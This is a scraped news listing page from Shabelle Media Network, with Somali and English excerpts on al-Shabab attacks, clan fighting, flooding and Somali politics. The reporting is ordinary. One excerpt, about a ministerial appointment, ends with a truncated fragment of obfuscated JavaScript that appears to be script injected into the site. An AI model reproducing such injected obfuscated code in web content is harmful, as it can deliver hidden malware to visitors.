Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

At least two people were killed near Kenya's eastern border with Somalia when the vehicle they were travelling in ran over an explosive device suspected to have been planted by the extremist al-Shabab rebels, officials said Tuesday. It is the second attack in two months targeting vehicles delivering supplies to a construction site where...

R/W Rooble iyo beesha caalamka oo shir ku leh magaalada Muqdisho + Sawirro

Ra’iisul Wasaaraha XFS oo furay shir ay ka qayb galayaan saaxiibbada Caalamiga ah ee Soomaaliya Maxamed Xuseen Rooble iyo Wakiilada Beesha Caalamka ayaa shir uga furmay magaaladda Muqdisho, shirkan ayaa looga hadlaya xaaladaha siyaasada dalka, doorashooyinka & fududeynta howlaha horyaala Xukuumadda Ra’iisul Wasaaraha oo ay qayb ka tahay shirka 20-ka bisha May ka dhacaya Caasimadda Mogadisho.

Qarax ka dhacay degmada Kaxda iyo wararkii ugu dambeeyey

Ugu yaraan saddex ruux ayaa ku dhintay, mid kalena dhaawac ayaa soo gaaray, kadib markii qarax lala beegsaday  gaari nooca raaxad ah o marayay degmada Kaxda ee gobolka Banaadir. Wararka ayaa sheegaya in qaraxa oo ahaa nooca dhulka lagu aaso, uu la kacay gaari Land-Cruiser ah oo halkaas marayay, inkastoo aan weli la xaqiijin...

Wabiga Shabelle oo fatahaad horleh ka sameeyey magaalada Jowhar

Qeybo ka mid ah Tuulooyinka hoosyimaada magaalada Jowhar ee caasimadda Maamulka Hirshabeelle, wax kasocda qul qulka dadka ka barkacay Fatahaad uu sameeyayWabiga shabeelle Sexdii cishe ee la soo dhaafay. Wabiga Shabeelle ayaa ku fatahay Tuulooyin ay ka mid yahiin  Baarey iyo Moyko, oo hoos yimaado magaalada Jowhar,  sidookale Biyaha fatahaada ayaa gooyay dhul beereed...

Faah faahino kasoo baxaya dagaal ka dhacay Beledweyne

Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay dagaal u dhexeeyey labo maleeshiyo beeleed oo saaka ka dhacay gudaha magaalada Beledweyne ee xarunta gobolka Hiiraan. Dagaalka oo geystay khasaare isugu jiro dhimasho iyo dhaawac ayaa ka dhacay galbeedka magaaladaasi, kadib markii ay labada dhinac isku qabteen muran ka dhashay dhul ku yaalla halkaasi.

Duqa Muqdisho iyo Sheekh Shariif oo ka wada hadlay xaaladda dalka + Sawirro

Guddoomiyaha Gobalka Banaadir ahna Duqa magalaada Muqdisho Mudane Cumar Maxamuud   Maxamed (Cumar filish) ayaa la kulmay Madaxweynihii  hore ee Soomaaliya Mudane Shariif Sheekh Axmed, iyagoo kawada hadlay arrimaha doorashooyinka, amniga caasimadda iyo qaboojinta xasaradaha ka soo cusbooday arrimaha doorashooyinka Dalka.

Sawirro: MW Farmaajo oo kulan la qaatay Culimada Soomaaliyeed

Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo oo Madaxtooyada Qaranka kulan afuro ah kula qaatay qaar ka mid ah culimada Soomaaliyeed ayaa tilmaamay in dhibaatooyinka kala duwan ee dib u dhigay dalkeenna lagaga gudbi karo wadashaqeyn buuxda oo ay yeeshaan shacabka, culimada diinta iyo Madaxda dowladda. Madaxweynaha ayaa culimada ku bogaadiyey doorka wanaagsan...

Sawirro: Axmed Madoobe oo la kulmay saraakiil ka tirsan ciidamada Mareykanka

Madaxweynaha Dowlad Goboleedka Jubbaland Mudane Axmed Maxamed Islaam ayaa kulan la qaatay sarakiisha ciidamada Mareykanka ee ka howlagala Jubbaland. Kulanka oo ka dhacay xarunta Madaxtooyada waxaa Madaxweynaha ku wehelinayay sareeye guuto Maxamed Cabdi Sheekh Taliyaha guud ee Ciidamada Jubbaland iyo Gaashanle sare Maxamed Guuleed Xasan Taliye ku xigeenka Ciidamada Jubbaland. Kulanka...

Ra’iisul wasaare Maxamed Xuseen Rooble oo magacaabay wasiir cusub

Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Maxamed Xuseen Rooble ayaa Mudane Cabdiwahaab Ugaas Xuseen Ugaas Khaliif u magacaabay Wasiirka Wasaaradda Shaqada iyo Arrimaha Bulshada ee Xukuumadda Federaalka Soomaaliya. Ra’iisul Wasaare Rooble ayaa faray Mudanaha la magcaabay in uu sida ugu dhaqsiyaha badan ula wareego xilkiisa, una dar dargeliyo howlaha Xukuumadda horyaalla. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return...

Garissa elders welcome state’s move to close refugee camps

Garissa elders have  welcomed the move by the government to close Kakuma and Daadab refugee camps. They said they are concerned by the political intrigues in Somalia that followed President Mohamed Farmaajo's move to extend his term by two years. Speaking on Monday at a hotel in Garissa, the elders led...

WARAR KALE

Somalia Issues Official Casualty Figures After Mogadishu Clashes

MOGADISHU, Somalia – Somalia's Ministry of Health and Human Services said Sunday that one person was killed and 55 others wounded during security-related incidents...

Former Somali President Warns of Deepening Political and Security Crisis

MOGADISHU, Somalia – Former Somali president Mohamed Abdullahi Mohamed has warned that Somalia is entering a dangerous phase of political and security instability, accusing...

UN Security Council to Discuss Somalia

NEW YORK - The UN Security Council is set to meet in the coming weeks to discuss the situation in Somalia, amid growing concerns...